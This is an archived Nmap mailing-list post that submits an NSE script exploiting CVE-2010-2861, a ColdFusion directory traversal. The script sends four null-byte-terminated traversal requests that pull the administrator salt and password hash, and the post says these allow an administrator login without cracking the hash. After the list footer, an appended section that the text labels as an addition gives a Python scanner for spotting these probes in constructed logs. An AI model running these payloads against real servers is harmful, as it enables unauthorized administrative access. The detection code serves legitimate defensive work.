Nmap Development mailing list archives
CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission
From: Micah <micah.hoffman () gmail com>
Date: Fri, 10 Feb 2012 16:34:53 -0500
First time poster here. I created an NSE for the CVE-2010-2861 ColdFusion locale dir traversal. It takes an IP and port and will look (if it is HTTP/HTTPS) for the 4 locations where the password.properties file could be. It'll return the salt and password hash, both scraped from the response page. This is my first NSE attempt and I'm sure that the code can be optimized, but it does work.

There was 1 more step I wanted to take with this but could not: to use this information you need to get the SHA1 HMAC by using the salt (retrieved from the page) and the hash (also in the page). It is this HMAC that authenticates you to the server. I couldn't find a way to get this.

Wanted to submit it for inclusion in nmap's scripts but couldn't find a submission form or anything. Hoping that posting it here gets it closer to being included.

--- Micah

------------------------------------------------------
http-coldfusion-dir-traversal.nse

description = [[
This script will execute a directory traversal attack against a ColdFusion
server and try to grab the password hash for the administrator user. Using
this information and a little web proxying, you can log into the ColdFusion
server as the administrator without cracking the password hash.

For more information on this vulnerability see:
* http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861
]]

---
-- @usage
-- nmap --script http-coldfusion-dir-traversal -p80,443 <target>
--
-- @output
-- 80/tcp open http
-- | http-coldfusion-dir-traversal:
-- |   CFusionMX -> SUCCESS - Salt: 1111111111111, Hash: AB3717200CD629BE34926297D9A0E87C7B0E7761
-- |   CFusionMX7 -> SUCCESS - Salt: 2222222222222, Hash: 0976A887B98C87E545D3A56F8F87D88E8E0A0980
-- |   ColdFusion8 -> SUCCESS - Salt: 3333333333333, Hash: A43A778B89C09D09E0F776A897F0976534356500
-- |_  JRun4\servers -> SUCCESS - Salt: 44444444444444, Hash: 0976A887B98C87E545D3A56F8F87D88E8E0A0980

author = "Micah Hoffman"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
-- "intrusive" and "safe" are mutually exclusive NSE categories; the script
-- sends exploit requests to the target, so it is intrusive, not safe.
categories = {"intrusive", "vuln"}

local http = require "http"
local shortport = require "shortport"

portrule = shortport.http

action = function(host, port)
  -- Fetch one candidate page and scrape the salt and password hash from it
  local grabAndGrep = function(page)
    -- Do the HTTP GET request for the page
    local response = http.get(host, port, page)
    -- Is there no response?
    if not response.status then
      return "No response"
    end
    -- Is the response not an HTTP 200 code?
    if response.status ~= 200 then
      return "HTTP response code not 200"
    end
    -- A 200 with no body cannot contain the strings we look for
    if not response.body then
      return "Not vuln"
    end
    -- The salt sits in a hidden form field; the hash is a run of at least 20
    -- uppercase hex characters after "password=" in the leaked properties file
    -- (Lua patterns have no {n} quantifier, hence the repeated class)
    local saltcontent = response.body:match("salt.*value=\"(%d+)")
    local hashcontent = response.body:match("password=(" .. string.rep("[A-F0-9]", 20) .. "+)")
    -- If a page has both the salt and the password in it then the traversal worked
    if saltcontent and hashcontent then
      return string.format("SUCCESS - Salt: %s, Hash: %s", saltcontent, hashcontent)
    end
    return "Not vuln"
  end

  -- Each probe ends in a literal "%00" (URL-encoded null byte) so the server
  -- truncates the suffix it appends to the locale name. It must be written
  -- without a backslash: "\%" is not a valid Lua escape in Lua 5.2 and later.
  -- ColdFusion 6 location
  local cf6 = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties%00en')
  -- ColdFusion 7 location
  local cf7 = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties%00en')
  -- ColdFusion 8 location
  local cf8 = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en')
  -- All ColdFusion versions (JRun deployment)
  local cfall = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties%00en')

  -- Build the result as one local string (the original assigned a global
  -- "final_out" while declaring a local "finalout")
  local finalout = "\n  CFusionMX -> " .. cf6 ..
                   "\n  CFusionMX7 -> " .. cf7 ..
                   "\n  ColdFusion8 -> " .. cf8 ..
                   "\n  JRun4\\servers -> " .. cfall
  return finalout
end

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
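On the defender's side, the four probe URLs the script sends leave a distinctive trace in the web server's access log: a request to enter.cfm whose locale parameter carries a traversal sequence, a NUL byte and the name password.properties. The following is an added example and not part of Micah's post or of Nmap: a small Python scanner over constructed combined-format log lines that flags such requests and rates a 200 response higher, because (as the script itself checks) that is the case in which the file contents were served. The log lines, IP addresses, timestamps and indicator names are all constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format). The first two
# carry the traversal payload in percent-encoded and raw-backslash form; the
# last two are benign requests. None of this is real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2012:16:34:53 -0500] "GET /CFIDE/administrator/enter.cfm?locale=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CCFusionMX%5Clib%5Cpassword.properties%00en HTTP/1.1" 200 5123
203.0.113.7 - - [10/Feb/2012:16:34:54 -0500] "GET /CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en HTTP/1.1" 200 5123
198.51.100.2 - - [10/Feb/2012:16:35:10 -0500] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 4870
198.51.100.9 - - [10/Feb/2012:16:36:00 -0500] "GET /index.cfm HTTP/1.1" 200 1200
"""

# Minimal combined-log parser: client IP, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

ADMIN_LOGIN_PATH = "/cfide/administrator/enter.cfm"


def classify_request(target: str) -> list[str]:
    """Return the indicators found in one request target (path plus query).

    Only the ColdFusion administrator login page takes the locale parameter
    that CVE-2010-2861 abuses, so everything else is ignored. parse_qs
    decodes percent-encoding once, which turns %5C into a backslash and
    %00 into a real NUL character before the checks run.
    """
    findings: list[str] = []
    parts = urlsplit(target)
    if not parts.path.lower().endswith(ADMIN_LOGIN_PATH):
        return findings
    query = parse_qs(parts.query, keep_blank_values=True)
    for value in query.get("locale", []):
        if "..\\" in value or "../" in value:
            findings.append("traversal sequence in locale")
        if "\x00" in value:
            findings.append("NUL byte in locale")
        if "password.properties" in value.lower():
            findings.append("password.properties in locale")
    return findings


def scan_log(text: str) -> list[dict]:
    """Scan log text and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        indicators = classify_request(match["target"])
        if not indicators:
            continue
        alerts.append({
            "ip": match["ip"],
            "ts": match["ts"],
            "status": int(match["status"]),
            # A 200 means the login page rendered with the traversed file's
            # contents, which is exactly the condition the NSE script treats
            # as SUCCESS; a non-200 is an attempt that was most likely blocked.
            "severity": "high" if match["status"] == "200" else "medium",
            "indicators": indicators,
        })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['severity'].upper():6} {alert['ip']} [{alert['ts']}] "
              f"status={alert['status']} {', '.join(alert['indicators'])}")
```

Because the match runs on the decoded locale value, the percent-encoded and raw-backslash variants of the probe produce the same three indicators; a WAF or log rule that only looks for the literal string `..\` in the raw request line would miss the first form.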
Current thread:
- CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission Micah (Feb 10)
- Re: CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission Patrik Karlsson (Feb 16)
- Re: CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission Patrik Karlsson (Feb 16)
- Re: CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission Patrik Karlsson (Feb 16)